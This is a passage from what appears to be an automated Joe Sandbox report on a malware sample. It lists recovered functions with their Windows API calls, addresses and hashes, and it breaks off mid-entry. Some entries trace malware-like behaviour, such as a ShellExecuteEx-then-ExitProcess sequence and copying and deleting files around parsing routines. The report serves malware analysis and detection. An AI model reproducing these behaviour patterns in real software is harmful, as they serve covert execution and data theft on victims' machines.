SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007F66B9
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007F66C7
ExitProcess.KERNEL32 ref: 007F66E1

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: daa8e1f5581b8d711db1781a6f7051ce48559ddf37c792e291cea45498be145d
Instruction ID: c6e2898eedd23289ca041518e18bdc2b143c1f51a6cb5fbcefe9440f62789bbc
Opcode Fuzzy Hash: daa8e1f5581b8d711db1781a6f7051ce48559ddf37c792e291cea45498be145d
Instruction Fuzzy Hash: 0121DCB5D1420DABCF14EFE4D9459EEB7BABF48300F04852EE50AE3250EB359605CB69

Function 004163C0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(004210DC,?,?,004165B1,00000000,?,00845518,?,004210DC,?,00000000,?), ref: 0041640C
sscanf.NTDLL ref: 00416439
SystemTimeToFileTime.KERNEL32(004210DC,00000000,?,?,?,?,?,?,?,?,?,?,?,00845518,?,004210DC), ref: 00416452
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00845518,?,004210DC), ref: 00416460
ExitProcess.KERNEL32 ref: 0041647A

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: b24c6a5c92350c354d4ebcfb20d60a8ccc44bbb0fa6f140ea9607248a59cc67f
Instruction ID: 830abe8b8eab449a7d9cc0da15019f7c77d9f2c5bac1468e5daa421451f66edb
Opcode Fuzzy Hash: b24c6a5c92350c354d4ebcfb20d60a8ccc44bbb0fa6f140ea9607248a59cc67f
Instruction Fuzzy Hash: EA21E1B5D14208AFCF14EFE4D945ADEB7BABF48304F04852EE50AE3250EB349605CB69

Function 00418260 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DF8,00000000,?), ref: 004182CF
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DF8,00000000,?), ref: 004182D6
wsprintfA.USER32 ref: 004182F0

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Strings

F(t, xrefs: 004182A4, 004182B3
%dx%d, xrefs: 004182E7

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: F(t$%dx%d
API String ID: 2716131235-3934083006
Opcode ID: 66e761acad43debc60f61778fff7699e4179135cb3781a94481e90bfcfef83f1
Instruction ID: 994268d552e07794471dd3910f4d3ddbdeb6f1ac9b11d1c79e25ca2fe4432fdb
Opcode Fuzzy Hash: 66e761acad43debc60f61778fff7699e4179135cb3781a94481e90bfcfef83f1
Instruction Fuzzy Hash: 492130B1A40608AFDB10DFA4DC45FAEBBB9FB48710F104119F605A7290C779A901CBA5

Function 004178A0 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178D7
HeapAlloc.KERNEL32(00000000), ref: 004178DE
RegOpenKeyExA.ADVAPI32(80000002,00848838,00000000,00020119,?), ref: 004178FE
RegQueryValueExA.ADVAPI32(?,0087BC28,00000000,00000000,000000FF,000000FF), ref: 0041791F
RegCloseKey.ADVAPI32(?), ref: 00417932

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: d4f8544a164a9437c7f2146de9882181f67f3b24d4450b32dfc713e681060546
Instruction ID: 7b98265181db112957e654b40feb51e707849e62a0e01f8308d40af4a82c50e7
Opcode Fuzzy Hash: d4f8544a164a9437c7f2146de9882181f67f3b24d4450b32dfc713e681060546
Instruction Fuzzy Hash: EB11C1B1A04605AFDB10CF84DD4AFBFBB79FB48B10F10411AF605A7280D7785805CBA5

Function 007F7427 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F743B
RtlAllocateHeap.NTDLL(00000000), ref: 007F7442
RegOpenKeyExA.ADVAPI32(80000002,0062CB98,00000000,00020119,007F73C0), ref: 007F7462
RegQueryValueExA.ADVAPI32(007F73C0,00420A9C,00000000,00000000,?,000000FF), ref: 007F7481
RegCloseKey.ADVAPI32(007F73C0), ref: 007F748B

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 6c07f27ec60b8ac9df4e5178828e9d35e6ab3eda5138c8e540781496da3810dc
Instruction ID: f4164284b6cc652335d425666cc0d9f22d7ae27bfe06324be28e9ae73b1bca06
Opcode Fuzzy Hash: 6c07f27ec60b8ac9df4e5178828e9d35e6ab3eda5138c8e540781496da3810dc
Instruction Fuzzy Hash: 0F012CB5A40708BBDB10DFE0DC4AFAEB779AB08700F104558FA05A6291D6755A018B55

Function 00418D00 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0087B7B0,?,?,?,00410F1C,?,0087B7B0,00000000), ref: 00418D0C
lstrcpyn.KERNEL32(0062D378,0087B7B0,0087B7B0,?,00410F1C,?,0087B7B0), ref: 00418D30
lstrlenA.KERNEL32(?,?,00410F1C,?,0087B7B0), ref: 00418D47
wsprintfA.USER32 ref: 00418D67

Strings

%s%s, xrefs: 00418D55

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 95580f9ef10e992e71bb9d5f92c0387debde11b91ee44bd877bd47b6543a2d40
Instruction ID: 934000c32db0b3497a9cf3f86b5bcb86f2a34007e8430f093dfbe5a2fe39e620
Opcode Fuzzy Hash: 95580f9ef10e992e71bb9d5f92c0387debde11b91ee44bd877bd47b6543a2d40
Instruction Fuzzy Hash: 4D0121B5500A08FFDB14DFA8D944EAE7B7AEF49354F108148F9099B340C731AA41CB95

Function 007E1507 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 007E151B
RtlAllocateHeap.NTDLL(00000000), ref: 007E1522
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007E153E
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007E155C
RegCloseKey.ADVAPI32(?), ref: 007E1566

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: b8563e144584e458f87bf561f54c88dffa2f1145a5d88f54fd71737305c450da
Instruction ID: c3d92a9244dfb410eaa7f09b840f59e7c864ad14ae64f3b19060047e8a18e696
Opcode Fuzzy Hash: b8563e144584e458f87bf561f54c88dffa2f1145a5d88f54fd71737305c450da
Instruction Fuzzy Hash: 7B013179A40208BFDB10DFE0DC49FAEB779EF48710F108158FA0597290D6709A05CB50

Function 004012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
HeapAlloc.KERNEL32(00000000), ref: 004012BB
RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
RegCloseKey.ADVAPI32(?), ref: 004012FF

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: b8563e144584e458f87bf561f54c88dffa2f1145a5d88f54fd71737305c450da
Instruction ID: 190bc7a1a7c8d7045dc387aced5cbf31aaec2b72b8248f43f4a0638ea244b090
Opcode Fuzzy Hash: b8563e144584e458f87bf561f54c88dffa2f1145a5d88f54fd71737305c450da
Instruction Fuzzy Hash: 34013179A40208BFDB10DFE0DC49FAEB779FF48710F108158FA05A7290D6709A05CB50

Function 007FC398 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 007FC3A4

Part of subcall function 007FBBC6: __getptd_noexit.LIBCMT ref: 007FBBC9
Part of subcall function 007FBBC6: __amsg_exit.LIBCMT ref: 007FBBD6

__getptd.LIBCMT ref: 007FC3BB
__amsg_exit.LIBCMT ref: 007FC3C9
__lock.LIBCMT ref: 007FC3D9
__updatetlocinfoEx_nolock.LIBCMT ref: 007FC3ED

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: a586c996cf1574b599f2eddb3c96edfe578d7612bc30a95042c92d2825fb876f
Instruction ID: 7504ddb024b7f9230ef5c40b8cc3d4865885fbb8c152e9898b797feb2bbb6306
Opcode Fuzzy Hash: a586c996cf1574b599f2eddb3c96edfe578d7612bc30a95042c92d2825fb876f
Instruction Fuzzy Hash: 61F09672A4461CDBD622FB68990AB7D37A09F00760F104109F715673D2DB6C59418B57

Function 0041C131 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041C13D

Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F

__getptd.LIBCMT ref: 0041C154
__amsg_exit.LIBCMT ref: 0041C162
__lock.LIBCMT ref: 0041C172
__updatetlocinfoEx_nolock.LIBCMT ref: 0041C186

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: da157f3430a2bf975af02803655c68f1a585ca0f4a593862dc9274f96ca4ab26
Instruction ID: 9fc434d286289e419f3aa4a208740ff26eea7a26fa5dacee767cec1b97643960
Opcode Fuzzy Hash: da157f3430a2bf975af02803655c68f1a585ca0f4a593862dc9274f96ca4ab26
Instruction Fuzzy Hash: 4AF06271AD5310ABD720BBA95C427DA3790AF00728F15410FE454A62D3CB6C58D19A9E

Function 00410580 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,0084D680), ref: 004105DA
StrCmpCA.SHLWAPI(00000000,0084D5F0), ref: 004106A6
StrCmpCA.SHLWAPI(00000000,0084D5A0), ref: 004107DD

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Strings

@ZA, xrefs: 00410880, 00410894, 00410643, 0041075B, 00410646, 0041075E, 00410883

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpy
String ID: @ZA
API String ID: 3722407311-3461648394
Opcode ID: 29c5cd2db581ca218731bf439d6d64e6e8f2175d413794013a6096d7d4d0e621
Instruction ID: dd73e37cf26ee0a5b727ab7f8fa236140303cf2c4538d3aa2ff7e25b79bad790
Opcode Fuzzy Hash: 29c5cd2db581ca218731bf439d6d64e6e8f2175d413794013a6096d7d4d0e621
Instruction Fuzzy Hash: E6917775B002089FCB28EF65D995FED7775BF94304F00812EE8099F291DB349A59CB86

Function 004105A5 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,0084D680), ref: 004105DA
StrCmpCA.SHLWAPI(00000000,0084D5F0), ref: 004106A6
StrCmpCA.SHLWAPI(00000000,0084D5A0), ref: 004107DD

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Strings

@ZA, xrefs: 00410643, 0041075B, 00410646, 0041075E

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpy
String ID: @ZA
API String ID: 3722407311-3461648394
Opcode ID: fc998fdfc7e39f7ab4b68045de1ed52666e90aabc0f549348e332771e86086b8
Instruction ID: 4e5c4e7109811dd04489307e57989d734427ebddea2fc0f69e8a4a25ed86313c
Opcode Fuzzy Hash: fc998fdfc7e39f7ab4b68045de1ed52666e90aabc0f549348e332771e86086b8
Instruction Fuzzy Hash: 82819775B002089FCB28EF65D995EEDB7B5FF94304F10812DE8099F251DB34AA45CB86

Function 007F6337 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 007F636A

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

ShellExecuteEx.SHELL32(0000003C), ref: 007F642D
ExitProcess.KERNEL32 ref: 007F645C

Strings

<, xrefs: 007F63E0

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 868adbc781961c8cc953d4a7433aed8a1fe2d4641a939658634b268068d87eac
Instruction ID: cc945948d5e24c2255d0c90fa422d7681fc8a8af4ff99db79e0258cec766e7de
Opcode Fuzzy Hash: 868adbc781961c8cc953d4a7433aed8a1fe2d4641a939658634b268068d87eac
Instruction Fuzzy Hash: E6311CB1811218EADB54EF90DC99FEDB778AF44300F404199F309A6291DF786B48CF59

Function 004160D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416103

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

ShellExecuteEx.SHELL32(0000003C), ref: 004161C6
ExitProcess.KERNEL32 ref: 004161F5

Strings

<, xrefs: 00416179

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: bdb6a8b14dc9c5b09b7d60e9b7035ce96c62f5cd7ca08c27a46a245047fc33f5
Instruction ID: 54b6532b0b3a1e4a3a0de688d9ef2eddded6cf57616e9fa182c501fcadca31e9
Opcode Fuzzy Hash: bdb6a8b14dc9c5b09b7d60e9b7035ce96c62f5cd7ca08c27a46a245047fc33f5
Instruction Fuzzy Hash: F6318EB1801218ABCB14EB90CC86FDEB778AF54314F40419EF20962191DF786B88CF69

Function 004187F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00418FBE,00000000), ref: 004187FB
HeapAlloc.KERNEL32(00000000,?,?,00418FBE,00000000), ref: 00418802
wsprintfW.USER32 ref: 00418818

Strings

%hs, xrefs: 0041880F

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 79e9d64faf86ba83e26f0357b0342198ccb0edd89fdd2a8e15abc92a0c7754c1
Instruction ID: ed9823074eed6dc814ef0c36eacf0fed31b39f083cef978cb02bde33a7ef5422
Opcode Fuzzy Hash: 79e9d64faf86ba83e26f0357b0342198ccb0edd89fdd2a8e15abc92a0c7754c1
Instruction Fuzzy Hash: DAE0EC75A40208FBD720EF94ED0AE6D77A9EB04711F100154FE0997290DA719E119BA9

Function 007EA417 Relevance: 6.4, APIs: 4, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

Part of subcall function 007F8867: GetSystemTime.KERNEL32(00420E02,0062CAA4,0042059E,?,?,007E1660,?,0000001A,00420E02,00000000,?,0062C9F0,?,00424EAC,00420DFF), ref: 007F888D

Part of subcall function 007FA557: lstrcpy.KERNEL32(00000000,?), ref: 007FA5A9
Part of subcall function 007FA557: lstrcat.KERNEL32(00000000), ref: 007FA5B9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007EA498
lstrlen.KERNEL32(00000000), ref: 007EA851

Part of subcall function 007EA0C7: memcmp.MSVCRT ref: 007EA0E2
Part of subcall function 007EA0C7: memset.MSVCRT ref: 007EA115
Part of subcall function 007EA0C7: LocalAlloc.KERNEL32(00000040,?), ref: 007EA165

lstrlen.KERNEL32(00000000,00000000), ref: 007EA594
DeleteFileA.KERNEL32(00000000), ref: 007EA8D8

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID:
API String ID: 3258613111-0
Opcode ID: 2562bd79b987ec0c2a71415e6feb57cef1366c53d6138557de4925b52f2e6d96
Instruction ID: eaee67b27e78ba516140ff056e0a46d8298ca920a84a8a912362ee1d515f8551
Opcode Fuzzy Hash: 2562bd79b987ec0c2a71415e6feb57cef1366c53d6138557de4925b52f2e6d96
Instruction Fuzzy Hash: FCD1F0B2C1015CEACB15EBA4DC9ADFE7338AF14300F508159F65A72191EF786A08DB66

Function 0040A1B0 Relevance: 6.4, APIs: 4, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00418600: GetSystemTime.KERNEL32(?,008499C8,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A231
lstrlenA.KERNEL32(00000000), ref: 0040A5EA

Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE

lstrlenA.KERNEL32(00000000,00000000), ref: 0040A32D
DeleteFileA.KERNEL32(00000000), ref: 0040A671

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID:
API String ID: 3258613111-0
Opcode ID: 02bf8600381f449f67df2dd29c7aece9ddd89fe16b151028a909fe24cb4b6cba
Instruction ID: babd7ff3150fa9bd4e199d5026f054df416ea87c2dc191fa558e2381e0c2d671
Opcode Fuzzy Hash: 02bf8600381f449f67df2dd29c7aece9ddd89fe16b151028a909fe24cb4b6cba
Instruction Fuzzy Hash: 17D12472811108AACB14FBA5DC96EEE7338AF14314F50815EF51772091EF786A9CCB7A

Function 007ED4A7 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
